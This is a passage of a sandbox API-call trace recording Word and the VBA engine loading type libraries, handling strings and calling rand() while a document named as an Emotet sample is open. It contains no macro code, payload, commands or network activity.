returned 0x0 [0067.651] wcscpy_s (in: _Destination=0x429cee8, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0067.651] wcscpy_s (in: _Destination=0x429cf5e, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0067.651] ITypeLib:LocalReleaseTLibAttr (This=0x631b4c0) returned 0x0 [0067.651] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a648b0, cb=0x1a0) returned 0x67b47c0 [0067.651] wcscpy_s (in: _Destination=0x67b47c0, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0067.651] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x145fe8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0067.652] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0067.652] strcpy_s (in: _Dst=0x145de0, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0067.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x145de0, cbMultiByte=5, lpWideCharStr=0x145c30, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0067.652] wcsncpy_s (in: _Destination=0x145be0, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0067.652] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0067.652] IMalloc:Alloc (This=0x7fefec05380, cb=0x11c) returned 0x6a07610 [0067.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x6a07610, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0067.652] IMalloc:Free (This=0x7fefec05380, pv=0x6a07610) [0067.652] IMalloc:Realloc (This=0x7fefec05380, pv=0x6943fc0, cb=0x300) returned 0x2715490 [0067.652] wcscpy_s (in: _Destination=0x27155d0, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0067.652] wcsncpy_s (in: _Destination=0x145c20, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0067.652] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0067.652] IMalloc:Alloc (This=0x7fefec05380, cb=0x11c) returned 0x6a07610 [0067.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x6a07610, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0067.652] IMalloc:Free (This=0x7fefec05380, pv=0x6a07610) [0067.652] wcsncpy_s (in: _Destination=0x145be0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.652] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.652] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0x6911260 [0067.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0x6911260, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.652] IMalloc:Free (This=0x7fefec05380, pv=0x6911260) [0067.652] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0067.652] IUnknown:AddRef (This=0x631b4c0) returned 0x3 [0067.652] IUnknown:QueryInterface (in: This=0x631b4c0, riid=0x7fee3b285a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146008 | out: ppvObject=0x146008*=0x0) returned 0x80004002 [0067.652] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x145fd0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0067.652] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0067.653] IUnknown:Release (This=0x631b4c0) returned 0x2 [0067.653] GetModuleFileNameW (in: hModule=0x7fee3780000, lpFilename=0x7fee3b5e4c0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0067.653] QueryPathOfRegTypeLib (in: guid=0x7fee3b2dd50*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x4, wMin=0x0, lcid=0x409, lpbstrPathName=0x146070 | out: lpbstrPathName=0x146070) returned 0x0 [0067.657] LoadTypeLibEx (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", regkind=0x2, pptlib=0x1460c8*=0x0 | out: pptlib=0x1460c8*=0x665ba50) returned 0x0 [0067.665] IUnknown:AddRef (This=0x665ba50) returned 0x2 [0067.665] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x1460e8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3557c0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3557c0*="\x57c0\x35") returned 0x0 [0067.666] IUnknown:QueryInterface (in: This=0x665ba50, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x145ed8 | out: ppvObject=0x145ed8*=0x0) returned 0x80004002 [0067.666] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x145ed0, pDummy=0x10 | out: ppTLibAttr=0x145ed0, pDummy=0x10) returned 0x0 [0067.666] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x0, pbstrName=0x145ec8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xf2cbcfb1f258 | out: pbstrName=0x145ec8*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xf2cbcfb1f258) returned 0x0 [0067.666] StringFromGUID2 (in: rguid=0x6884520*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x145ef0, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0067.666] _ultow_s (in: _Value=0x4, _Buffer=0x145e3a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0067.666] _ultow_s (in: _Value=0x2, _Buffer=0x145e3e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0067.666] _ultow_s (in: _Value=0x9, _Buffer=0x145e42, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0067.666] wcscpy_s (in: _Destination=0x429ce88, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0067.666] wcscpy_s (in: _Destination=0x429ce8e, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0067.666] wcscpy_s (in: _Destination=0x429ceda, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0067.666] wcscpy_s (in: _Destination=0x429cee8, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0067.666] wcscpy_s (in: _Destination=0x429cf6e, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0067.666] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0067.666] IMalloc:Realloc (This=0x7fefec05380, pv=0x67b47c0, cb=0x340) returned 0x690c880 [0067.666] wcscpy_s (in: _Destination=0x690c9c8, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0067.666] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x145fe8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0067.666] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0067.666] strcpy_s (in: _Dst=0x145de0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0067.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x145de0, cbMultiByte=4, lpWideCharStr=0x145c30, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0067.666] IUnknown:AddRef (This=0x631b4c0) returned 0x3 [0067.666] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x145d00, pBstrLibName=0x145c30 | out: pfName=0x145d00*=0, pBstrLibName=0x145c30) returned 0x0 [0067.682] IUnknown:Release (This=0x631b4c0) returned 0x2 [0067.682] IMalloc:Alloc (This=0x7fefec05380, cb=0xc) returned 0x6877480 [0067.682] IMalloc:Free (This=0x7fefec05380, pv=0x6884b50) [0067.682] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x6884b50 [0067.682] IMalloc:Free (This=0x7fefec05380, pv=0x6877480) [0067.682] wcsncpy_s (in: _Destination=0x145be0, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0067.682] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0067.682] IMalloc:Alloc (This=0x7fefec05380, cb=0x122) returned 0x6a07610 [0067.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x6a07610, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0067.682] IMalloc:Free (This=0x7fefec05380, pv=0x6a07610) [0067.682] IMalloc:Realloc (This=0x7fefec05380, pv=0x2715490, cb=0x600) returned 0xaf1a8e0 [0067.682] wcscpy_s (in: _Destination=0xaf1ab70, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0067.682] wcsncpy_s (in: _Destination=0x145c20, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0067.682] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0067.682] IMalloc:Alloc (This=0x7fefec05380, cb=0x122) returned 0x6a07610 [0067.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x6a07610, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0067.682] IMalloc:Free (This=0x7fefec05380, pv=0x6a07610) [0067.682] wcsncpy_s (in: _Destination=0x145be0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.682] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.683] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0x6603960 [0067.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0x6603960, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.683] IMalloc:Free (This=0x7fefec05380, pv=0x6603960) [0067.683] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0067.683] IUnknown:AddRef (This=0x665ba50) returned 0x3 [0067.683] IUnknown:QueryInterface (in: This=0x665ba50, riid=0x7fee3b285a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146008 | out: ppvObject=0x146008*=0x0) returned 0x80004002 [0067.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x145fd0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0067.683] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0067.683] IUnknown:Release (This=0x665ba50) returned 0x2 [0067.683] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58f30 [0067.683] IMalloc:GetSize (This=0x7fefec05380, pv=0x6a58f30) returned 0x0 [0067.683] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58f40 [0067.683] IMalloc:GetSize (This=0x7fefec05380, pv=0x6a58f40) returned 0x0 [0067.684] VirtualQuery (in: lpAddress=0x1465b0, lpBuffer=0x146570, dwLength=0x30 | out: lpBuffer=0x146570*(BaseAddress=0x146000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xa000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0067.684] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a58f50 [0067.684] qsort (in: _Base=0x6a58f50, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee38d5594 | out: _Base=0x6a58f50) [0067.685] IMalloc:Free (This=0x7fefec05380, pv=0x6a58f50) [0067.685] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x6877480 [0067.685] IMalloc:Alloc (This=0x7fefec05380, cb=0xc) returned 0x6877560 [0067.685] IMalloc:GetSize (This=0x7fefec05380, pv=0x6877560) returned 0xc [0067.685] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0067.685] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0067.685] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0067.685] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0067.685] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0067.685] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0067.685] IMalloc:Free (This=0x7fefec05380, pv=0x6a58f40) [0067.685] IMalloc:Free (This=0x7fefec05380, pv=0x6a58f30) [0067.685] CoCreateGuid (in: pguid=0x1466b8 | out: pguid=0x1466b8*(Data1=0xd257525e, Data2=0xec61, Data3=0x4085, Data4=([0]=0x91, [1]=0x27, [2]=0x5e, [3]=0x73, [4]=0x65, [5]=0xd2, [6]=0x7e, [7]=0xe8))) returned 0x0 [0067.686] IMalloc:Alloc (This=0x7fefec05380, cb=0x6b0) returned 0xaf1aef0 [0067.686] srand (_Seed=0x5196) [0067.686] rand () returned 2707 [0067.686] rand () returned 5367 [0067.686] rand () returned 3107 [0067.686] rand () returned 25991 [0067.686] rand () returned 22224 [0067.686] rand () returned 7173 [0067.686] rand () returned 3305 [0067.686] rand () returned 5542 [0067.686] rand () returned 21093 [0067.686] rand () returned 7093 [0067.686] rand () returned 29645 [0067.686] rand () returned 30555 [0067.686] rand () returned 4452 [0067.686] rand () returned 15519 [0067.686] rand () returned 22682 [0067.687] rand () returned 20118 [0067.687] rand () returned 26125 [0067.687] rand () returned 28117 [0067.687] rand () returned 31912 [0067.687] rand () returned 27549 [0067.687] rand () returned 25247 [0067.687] rand () returned 12135 [0067.687] rand () returned 31572 [0067.687] rand () returned 27055 [0067.687] rand () returned 11630 [0067.687] rand () returned 26157 [0067.687] rand () returned 24237 [0067.687] rand () returned 16615 [0067.687] rand () returned 23350 [0067.687] rand () returned 7360 [0067.687] rand () returned 27760 [0067.687] rand () returned 12132 [0067.687] rand () returned 17327 [0067.687] rand () returned 21962 [0067.687] rand () returned 16183 [0067.687] rand () returned 15783 [0067.687] rand () returned 1121 [0067.687] rand () returned 21376 [0067.687] rand () returned 32749 [0067.687] rand () returned 25148 [0067.687] rand () returned 9658 [0067.687] rand () returned 30828 [0067.687] rand () returned 21381 [0067.687] rand () returned 2205 [0067.687] rand () returned 5726 [0067.687] rand () returned 9584 [0067.687] rand () returned 20715 [0067.687] rand () returned 32595 [0067.687] rand () returned 28862 [0067.687] rand () returned 14600 [0067.687] rand () returned 4923 [0067.687] rand () returned 4446 [0067.687] rand () returned 16108 [0067.687] rand () returned 5071 [0067.687] rand () returned 15410 [0067.687] rand () returned 20183 [0067.688] rand () returned 12462 [0067.688] rand () returned 17989 [0067.688] rand () returned 31458 [0067.688] rand () returned 18644 [0067.688] rand () returned 30673 [0067.688] rand () returned 19407 [0067.688] rand () returned 27305 [0067.688] rand () returned 17548 [0067.688] rand () returned 16063 [0067.688] rand () returned 30463 [0067.688] rand () returned 24163 [0067.688] rand () returned 10684 [0067.688] rand () returned 27988 [0067.688] rand () returned 29462 [0067.688] rand () returned 27615 [0067.688] rand () returned 12361 [0067.688] rand () returned 12270 [0067.688] rand () returned 32455 [0067.688] rand () returned 19344 [0067.688] rand () returned 4390 [0067.688] rand () returned 29891 [0067.688] rand () returned 17470 [0067.688] rand () returned 24709 [0067.688] rand () returned 15992 [0067.688] rand () returned 21368 [0067.688] rand () returned 29281 [0067.688] rand () returned 31899 [0067.688] rand () returned 26360 [0067.688] rand () returned 4847 [0067.688] rand () returned 31574 [0067.688] rand () returned 13554 [0067.688] rand () returned 18585 [0067.688] rand () returned 16736 [0067.688] rand () returned 7237 [0067.688] rand () returned 23197 [0067.688] rand () returned 5740 [0067.688] rand () returned 4779 [0067.688] rand () returned 4703 [0067.688] rand () returned 27550 [0067.688] rand () returned 30144 [0067.688] rand () returned 30956 [0067.689] rand () returned 8479 [0067.689] rand () returned 4113 [0067.689] rand () returned 22157 [0067.689] rand () returned 11088 [0067.689] rand () returned 19919 [0067.689] rand () returned 30631 [0067.689] rand () returned 11027 [0067.689] rand () returned 3880 [0067.689] rand () returned 29775 [0067.689] rand () returned 11094 [0067.689] rand () returned 17086 [0067.689] rand () returned 14140 [0067.689] rand () returned 6418 [0067.689] rand () returned 10063 [0067.689] rand () returned 19533 [0067.689] rand () returned 28002 [0067.689] rand () returned 7273 [0067.689] rand () returned 20785 [0067.689] rand () returned 17203 [0067.689] rand () returned 31311 [0067.689] rand () returned 13060 [0067.689] rand () returned 7804 [0067.689] rand () returned 19517 [0067.689] rand () returned 8108 [0067.689] rand () returned 18357 [0067.689] rand () returned 32584 [0067.689] rand () returned 17782 [0067.689] rand () returned 30829 [0067.689] rand () returned 10872 [0067.689] rand () returned 24887 [0067.689] rand () returned 3400 [0067.689] rand () returned 13150 [0067.689] rand () returned 12465 [0067.689] rand () returned 24232 [0067.689] rand () returned 17635 [0067.689] rand () returned 23550 [0067.689] rand () returned 10932 [0067.689] rand () returned 28205 [0067.689] rand () returned 4579 [0067.689] rand () returned 9617 [0067.689] rand () returned 21130 [0067.690] rand () returned 9792 [0067.690] rand () returned 9004 [0067.690] rand () returned 27761 [0067.690] rand () returned 6131 [0067.690] rand () returned 26929 [0067.690] rand () returned 32025 [0067.690] rand () returned 24997 [0067.690] rand () returned 28071 [0067.690] rand () returned 3427 [0067.690] rand () returned 20695 [0067.690] rand () returned 5300 [0067.690] rand () returned 31713 [0067.690] rand () returned 21944 [0067.690] rand () returned 25355 [0067.690] rand () returned 20411 [0067.690] rand () returned 23582 [0067.690] rand () returned 20042 [0067.690] rand () returned 17851 [0067.690] rand () returned 31166 [0067.690] rand () returned 16930 [0067.690] rand () returned 24924 [0067.690] rand () returned 26987 [0067.690] rand () returned 29500 [0067.690] rand () returned 13885 [0067.690] rand () returned 14480 [0067.690] rand () returned 18822 [0067.690] rand () returned 8454 [0067.690] rand () returned 17612 [0067.690] rand () returned 15962 [0067.690] rand () returned 14336 [0067.690] rand () returned 6481 [0067.690] rand () returned 18178 [0067.690] rand () returned 21428 [0067.690] rand () returned 3130 [0067.690] rand () returned 9993 [0067.690] rand () returned 10473 [0067.690] rand () returned 3603 [0067.690] rand () returned 14630 [0067.690] rand () returned 5992 [0067.690] rand () returned 20643 